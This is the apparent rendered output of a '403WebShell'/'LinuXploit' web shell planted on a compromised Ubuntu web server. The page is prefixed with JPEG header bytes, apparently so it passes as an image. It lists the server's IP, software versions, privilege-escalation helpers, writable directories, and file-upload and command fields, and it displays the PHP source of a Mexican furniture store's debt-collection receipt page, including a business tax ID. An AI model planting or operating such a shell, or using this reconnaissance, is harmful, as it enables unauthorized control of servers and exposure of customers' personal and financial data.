����JFIF��H�H����Exif��MM�*���� ��3����V�����3������3�(��������������������3�����403WebShell
403Webshell
Server IP : 74.208.127.88  /  Your IP : 216.73.216.192
Web Server : Apache/2.4.41 (Ubuntu)
System : Linux ubuntu 5.4.0-163-generic #180-Ubuntu SMP Tue Sep 5 13:21:23 UTC 2023 x86_64
User : www-data ( 33)
PHP Version : 7.4.3-4ubuntu2.29
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /proc/self/root/proc/thread-self/root/var/www/html/muebles/application/debtcollector/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /proc/self/root/proc/thread-self/root/var/www/html/muebles/application/debtcollector/detailsT.php
<?php
$titlepage="Ruta pendiente";
$idsmenu=2;

require_once ("../model/dbconn.php");
require_once ("../model/pos.php");


//por si no soporta idioma español el servidor
$diassemana = array("Domingo","Lunes","Martes","Miercoles","Jueves","Viernes","Sábado");
$meses = array("Enero","Febrero","Marzo","Abril","Mayo","Junio","Julio","Agosto","Septiembre","Octubre","Noviembre","Diciembre");


	$dayNumber=strftime("%d");
	$pay_period="S";
	$pay_period2="M";
    $currentDay=strtoupper($diassemana[date('w')]);

if(isset($_GET['contract'])){
	
	$fechahoy =  date("d-m-Y");
	$semana = date("W");
	
	$contract = $_GET['contract'];
	//BUSCAMOS LA TABLA PENDING RUTE LOS FOLIOS QUE ESTAN ASIGNADOS A ESTE COBRADOR 
	//se filtra por dia de cobro, periodicidad
	
	
	$pos = new pos();
	$pending = $pos->getPendingRouteByContract($contract);
	$pending_route = $pending[2];
	
	
	//print_r($pending_route);

?>

<!DOCTYPE html>

<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
 
	
	  <!-- owl.carousel CSS
		============================================ -->
	 <link rel="stylesheet" href="../../dist/css/sweetalert.css">
	 <link rel="stylesheet" href="../../css/owl.carousel.css">
	 <link rel="stylesheet" href="../../css/owl.theme.css">
     <link rel="stylesheet" href="../../css/owl.transitions.css">
	   <!-- animate CSS
		============================================ -->
    <link rel="stylesheet" href="../../css/animate.css">
	 <!-- mCustomScrollbar CSS
		============================================ -->
    <link rel="stylesheet" href="../../css/scrollbar/jquery.mCustomScrollbar.min.css">
    <!-- metisMenu CSS
		============================================ -->
    <link rel="stylesheet" href="../../css/metisMenu/metisMenu.min.css">
    <link rel="stylesheet" href="../../css/metisMenu/metisMenu-vertical.css">
    <!-- normalize CSS
		============================================ -->
    <link rel="stylesheet" href="../../css/normalize.css">
	<!-- morrisjs CSS
		============================================ -->
    <link rel="stylesheet" href="../../css/morrisjs/morris.css">
	 <!-- style CSS
		============================================ 
		-->
		 <link rel="stylesheet" href="../../style.css">
   
    <!-- responsive CSS
		============================================ -->
    <link rel="stylesheet" href="../../css/responsive.css">
    <!-- modernizr JS
		============================================ -->
    <script src="../../js/vendor/modernizr-2.8.3.min.js"></script>
	 <!-- main CSS
		============================================ -->
    <link rel="stylesheet" href="../../css/main.css">
	
	<!-- nalika Icon CSS
		============================================ -->
    <link rel="stylesheet" href="../../css/nalika-icon.css">
	
	  <!-- Bootstrap CSS
		============================================ -->
    <link rel="stylesheet" href="../../css/font-awesome.min.css">
	
	  <!-- responsive CSS
		============================================ -->
    <link rel="stylesheet" href="../../css/responsive.css">
	
	<!-- Google Fonts
		============================================ -->
    <link href="https://fonts.googleapis.com/css?family=Roboto:100,300,400,700,900" rel="stylesheet">
	
	<title>Detalle Cliente</title>
	
	 <style>
        h3 {
            color: white;              /* Cambia el color del texto a blanco */
            justify-content: center; /* Centra horizontalmente */
           
        }
		
		.row.d-flex.justify-content-center {
		  padding-left: 1px;
		  padding-right: 1px;
		  display: flex;
		}
		 
			
	 /* Posicionar el footer de manera fija al fondo */
		
		   /* Contenedor de la página */
        .container {
            display: flex;               /* Usamos flexbox */
            justify-content: center;     /* Centra el contenido horizontalmente */
            align-items: center;         /* Centra el contenido verticalmente */
            
            text-align: center;          /* Centra el texto dentro del h1 */
        }

        h1 {
            font-size: 16px;             /* Tamaño de fuente del título */
        }
		
		.footer-copy-right p {
			margin: 0;
			font-size: 12px;
			color: #fff;
		}

		.footer-copy-right a {
			color: #fff;
			text-decoration: none;
		}

		.footer-copy-right a:hover {
			text-decoration: underline;
		}		
    </style>
</head>

<body onload="window.print()">
	<div class="container">
		<h3>______________</h3>
		</div>
		<div class="container">
		<h3>Mueblería Victoria</h3>
		</div>
		<div class="container">
            <p style="color:black"><span>RFC: HOGF870809RK5 , </span></p>
            <p style="color:black"><span>Fecha: <?= $fechahoy; ?></span></p>
		</div>
		<div class="container">
			 <h3>Comprobante de Pago </h3>
		</div>
		
<div class="panel-body panel-csm">
    <div class="container-fluid"> <!-- Cambié el "row" por un contenedor de ancho completo -->
        <div class="row d-flex justify-content-center">
            <?php 
            foreach($pending_route as $key=>$route) { ?>
                <div class="col-12 <?php echo ($key) ? 'd-none' : ''; ?>" id="venta-<?=$key+1?>">
                    <h3>N° Contrato: <?=$route['contract']?></h3>
                    <div class="card col-12"> <!-- Cambié "col-8" por "col-12" para que ocupe todo el ancho -->
                        <div class="card-body">
                            <div class="col-12 d-flex justify-content-between">
                                <b>Nombre:</b> <span><?=$route['client_name']?></span>
                            </div>
                            <hr>
                            <div class="col-12 d-flex justify-content-between">
                                <b>Dirección:</b> <span><?=$route['street']?></span>
                            </div>
                            <hr>
                            <div class="col-12 d-flex justify-content-between">
                                <b>Mercancia:</b> <span><?=$route['m_item']?></span>
                            </div>
                            <hr>                            
                            <div class="col-12 d-flex justify-content-between">
                                <b>Dias de pago:</b> <span><?=$route['payday']?></span>
                            </div>
                            <hr>
                            <div class="col-12 d-flex justify-content-between">
                                <b>Monto de venta:</b> <span>$ <?=number_format($route['total'],2);?></span>
                            </div>
                            <hr>
                            <div class="col-12 d-flex justify-content-between">
                                <b>Saldo Anterior:</b> <span>$ <?=number_format($route['balance'],2);?></span>
                            </div>
                            <hr>
                            <div class="col-12 d-flex justify-content-between">
                                <b>Pago Recibido:</b> <span>$ <?=number_format($route['pay_min'],2);?></span>
                            </div>
                            <hr>
							
							 <div class="col-12 d-flex justify-content-between">
                                <b>Saldo Actual:</b> <span>$ <?=number_format($route['balance']-$route['pay_min'],2);?></span>
                            </div>
                            <hr>
                        </div>
                    </div>
                </div>
            <?php }?>        
           
        </div>    
    </div>    
</div>    

<div class="container">
			
            <p style="color:white"><span>Gracias Por su Pago!</span></p>
            <p style="color:white"><span>Evite Recargos Pagando puntualmente</span></p>
			
			...
		</div>
		
<?php		
	}else{
	echo "Error pago no encontrado";
}	

?>		
					
<script src="../../dist/js/sweetalert.min.js" type="text/javascript"></script>

<script src="../../js/notifications/notify.min.js"></script>

  <!-- wow JS
		============================================ -->
    <script src="../../js/wow.min.js"></script>
    <!-- price-slider JS
		============================================ -->
    <script src="../../js/jquery-price-slider.js"></script>
    <!-- meanmenu JS
		============================================ -->
    <script src="../../js/jquery.meanmenu.js"></script>
    <!-- sticky JS
		============================================ -->
    <script src="../../js/jquery.sticky.js"></script>
    <!-- scrollUp JS
		============================================ -->
    <script src="../../js/jquery.scrollUp.min.js"></script>
	 <!-- morrisjs JS
		============================================ -->
    <script src="../../js/sparkline/jquery.sparkline.min.js"></script>
    <script src="../../js/sparkline/jquery.charts-sparkline.js"></script>
    <!-- calendar JS
		============================================ -->
    <script src="../../js/calendar/moment.min.js"></script>
    <script src="../../js/calendar/fullcalendar.min.js"></script>
    <script src="../../js/calendar/fullcalendar-active.js"></script>

 <!-- wow JS
		============================================ -->
    <script src="../../js/wow.min.js"></script>
	
 <!-- owl.carousel JS
		============================================ -->
    <script src="../../js/owl.carousel.min.js"></script>	
	 <!-- tab JS
		============================================ -->
    <script src="../../js/tab.js"></script>
	
	 <!-- main JS
		============================================ -->
    <script src="../../js/main.js"></script>
	
	 <!-- wizard JS
		============================================ -->
    <script src="../../js/wizard/jquery.steps.js"></script>
    <script src="../../js/wizard/steps-active.js"></script>
    <!-- plugins JS
		============================================ -->
    <script src="../../js/plugins.js"></script>
    
</body>


<script>

	
        function printTable() {
            var printContent = document.getElementById('printableTable').outerHTML; // Obtiene la tabla a imprimir
            var win = window.open('', '', 'height=700,width=900'); // Abre una nueva ventana
            win.document.write('<html><head><title>Ticket de Pago</title></head><body>');
            win.document.write('<h3>Ticket de Pago</h3>'); // Título de la página a imprimir
            win.document.write('<p>Fecha: <?= $fechahoy; ?></p>'); // Fecha de la página a imprimir
            win.document.write(printContent); // Agrega la tabla
            win.document.write('</body></html>');
            win.document.close();
            win.print(); // Imprime el contenido
        }
  

</script>

</html>

Youez - 2016 - github.com/yon3zu
LinuXploit